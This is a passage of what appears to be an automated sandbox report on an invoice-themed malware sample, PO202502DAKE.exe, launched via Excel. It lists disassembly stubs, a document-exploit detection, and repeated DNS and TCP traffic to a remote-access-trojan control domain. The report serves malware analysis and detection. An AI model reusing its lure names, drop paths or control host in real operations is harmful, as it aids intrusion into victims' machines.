                          Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49737 version: TLS 1.2
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 12_2_00007FFC9CEF7210 SetLastError,FindFirstFileExW,GetLastError,12_2_00007FFC9CEF7210
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 28_2_00007FFC9CE47210 SetLastError,FindFirstFileExW,GetLastError,28_2_00007FFC9CE47210

                          Software Vulnerabilities

                          barindex
                          Document exploit detected (process start blacklist hit)
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Program Files\7-Zip\7z.exe
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then mov eax, dword ptr [rsi]12_2_00007FF6220A7A50
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then mov eax, dword ptr [rcx]12_2_00007FF6220A55C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FF6220A21F3
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then test rdx, rdx12_2_00007FFC9CC9DD60
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CD11D30
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rdi12_2_00007FFC9CD0FF20
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push r1412_2_00007FFC9CD0FF20
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then sub rsp, 38h12_2_00007FFC9CC7DEE0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h12_2_00007FFC9CC83FA0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rsi12_2_00007FFC9CCED9D0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CC699C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CCC7980
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h12_2_00007FFC9CC7DB40
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h12_2_00007FFC9CC7DBB0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then xor eax, eax12_2_00007FFC9CC71650
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then sub rsp, 38h12_2_00007FFC9CCDD640
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push r1512_2_00007FFC9CC8CCA0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then cmp byte ptr [rcx+1Dh], 00000000h12_2_00007FFC9CCFCDE0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then mov rcx, qword ptr [rcx+08h]12_2_00007FFC9CC70F10
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then test rdx, rdx12_2_00007FFC9CC9F040
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CC75030
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbp12_2_00007FFC9CD0C9E0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CC84630
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CC84630
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rsi12_2_00007FFC9CC845A0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h12_2_00007FFC9CC846F0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CD10160
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push r1512_2_00007FFC9CC98170
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push r1512_2_00007FFC9CC8E120
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push r1512_2_00007FFC9CCEE240
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rdi12_2_00007FFC9CC76260
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CCFE1C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push r1512_2_00007FFC9CC9819C
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CC84340
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CC84340
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CC84340
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then mov rcx, qword ptr [rcx+08h]12_2_00007FFC9CEAADD0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CEFBE40
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push r1512_2_00007FFC9CEC9DB0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rdi12_2_00007FFC9CF4E020
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push r1412_2_00007FFC9CF4E020
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h12_2_00007FFC9CEB5ED0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then test rdx, rdx12_2_00007FFC9CED59C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then sub rsp, 38h12_2_00007FFC9CF11C00
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then cmp edx, 02h12_2_00007FFC9CF2BB00
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h12_2_00007FFC9CEDBBB0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CEA7650
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rsi12_2_00007FFC9CECF280
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rsi12_2_00007FFC9CEF3420
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push r1512_2_00007FFC9CEC7400
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rsi12_2_00007FFC9CEF33D0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rsi12_2_00007FFC9CEBCD40
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h12_2_00007FFC9CEBCCF0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then test r8d, r8d12_2_00007FFC9CF3AF80
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbp12_2_00007FFC9CED0E99
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CEBC980
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CEBC980
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CEBC980
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CEDAB30
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CEAEB10
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CEBCC30
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CEBCC30
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbp12_2_00007FFC9CE92C25
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h12_2_00007FFC9CEBCBE0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h12_2_00007FFC9CEDC5D0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CEF61C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h12_2_00007FFC9CEF61C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then test rdx, rdx12_2_00007FFC9CED46E0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h12_2_00007FFC9CEBC690
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then mov rax, qword ptr [rcx+08h]12_2_00007FFC9CEFE230
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbp12_2_00007FFC9CF4A0E0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h12_2_00007FFC9CEB61E0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rbx12_2_00007FFC9CEF61C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h12_2_00007FFC9CEF61C0
                          Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502DAKE.exeCode function: 4x nop then push rdi12_2_00007FFC9CEB0190
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then mov eax, dword ptr [rsi]28_2_00007FF6E44A7A50
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then mov eax, dword ptr [rcx]28_2_00007FF6E44A55C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FF6E44A21F3
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then test rdx, rdx28_2_00007FFC9CBEDD60
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CC61D30
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rdi28_2_00007FFC9CC5FF20
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push r1428_2_00007FFC9CC5FF20
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then sub rsp, 38h28_2_00007FFC9CBCDEE0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h28_2_00007FFC9CBD3FA0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rsi28_2_00007FFC9CC3D9D0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CBB99C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CC17980
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h28_2_00007FFC9CBCDB40
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h28_2_00007FFC9CBCDBB0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then sub rsp, 38h28_2_00007FFC9CC2D640
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then xor eax, eax28_2_00007FFC9CBC167D
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rdi28_2_00007FFC9CBED780
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push r1528_2_00007FFC9CBDCCA0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then cmp byte ptr [rcx+1Dh], 00000000h28_2_00007FFC9CC4CDE0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then mov rcx, qword ptr [rcx+08h]28_2_00007FFC9CBC0F10
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then test rdx, rdx28_2_00007FFC9CBEF040
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CBC5030
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbp28_2_00007FFC9CC5C9E0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CBD4630
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CBD4630
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rsi28_2_00007FFC9CBD45A0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h28_2_00007FFC9CBD46F0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CC60160
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push r1528_2_00007FFC9CBE8170
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push r1528_2_00007FFC9CBDE120
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push r1528_2_00007FFC9CC3E240
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rdi28_2_00007FFC9CBC6260
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CC4E1C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push r1528_2_00007FFC9CBE819C
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CBD4340
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CBD4340
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CBD4340
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then mov rcx, qword ptr [rcx+08h]28_2_00007FFC9CDFADD0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CE4BE40
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push r1528_2_00007FFC9CE19DB0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h28_2_00007FFC9CE05ED0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rdi28_2_00007FFC9CE9E020
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push r1428_2_00007FFC9CE9E020
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then test rdx, rdx28_2_00007FFC9CE259C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then cmp edx, 02h28_2_00007FFC9CE7BB00
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then sub rsp, 38h28_2_00007FFC9CE61C00
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h28_2_00007FFC9CE2BBB0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CDF7650
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rsi28_2_00007FFC9CE1F280
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rsi28_2_00007FFC9CE43420
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push r1528_2_00007FFC9CE17400
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rsi28_2_00007FFC9CE433D0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rsi28_2_00007FFC9CE0CD40
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h28_2_00007FFC9CE0CCF0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbp28_2_00007FFC9CE20E99
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then test r8d, r8d28_2_00007FFC9CE8AF80
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CE0C980
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CE0C980
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CE0C980
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CE2AB30
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CDFEB10
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbp28_2_00007FFC9CDE2C25
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CE0CC30
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CE0CC30
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h28_2_00007FFC9CE0CBE0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h28_2_00007FFC9CE2C5D0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CE461C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h28_2_00007FFC9CE461C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then test rdx, rdx28_2_00007FFC9CE246E0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h28_2_00007FFC9CE0C690
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbp28_2_00007FFC9CE9A0E0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then mov rax, qword ptr [rcx+08h]28_2_00007FFC9CE4E230
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h28_2_00007FFC9CE061E0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx28_2_00007FFC9CE461C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then sub rsp, 28h28_2_00007FFC9CE461C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rdi28_2_00007FFC9CE00190
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then mov eax, dword ptr [rsi]33_2_00007FF6E44A7A50
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then mov eax, dword ptr [rcx]33_2_00007FF6E44A55C0
                          Source: C:\Users\user\SystemRootDoc\PO202502DAKE.exeCode function: 4x nop then push rbx33_2_00007FF6E44A21F3
                          Source: global trafficDNS query: name: f004.backblazeb2.com
                          Source: global trafficDNS query: name: myasyncrat.ddns.net
                          Source: global trafficDNS query: name: myasyncrat.ddns.net
                          Source: global trafficDNS query: name: otelrules.svc.static.microsoft
                          Source: global trafficDNS query: name: myasyncrat.ddns.net
                          Source: global trafficDNS query: name: myasyncrat.ddns.net
                          Source: global trafficDNS query: name: myasyncrat.ddns.net
                          Source: global trafficDNS query: name: myasyncrat.ddns.net
                          Source: global trafficDNS query: name: myasyncrat.ddns.net
                          Source: global trafficDNS query: name: myasyncrat.ddns.net
                          Source: global trafficDNS query: name: myasyncrat.ddns.net
                          Source: global trafficDNS query: name: myasyncrat.ddns.net
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49737 -> 13.107.246.60:443
                          Source: global trafficTCP traffic: 192.168.2.4:49738 -> 13.107.246.60:443
                          Source: global trafficTCP traffic: 192.168.2.4:49739 -> 13.107.246.60:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
                          Source: global trafficTCP traffic: 192.168.2.4:49722 -> 149.137.128.16:443
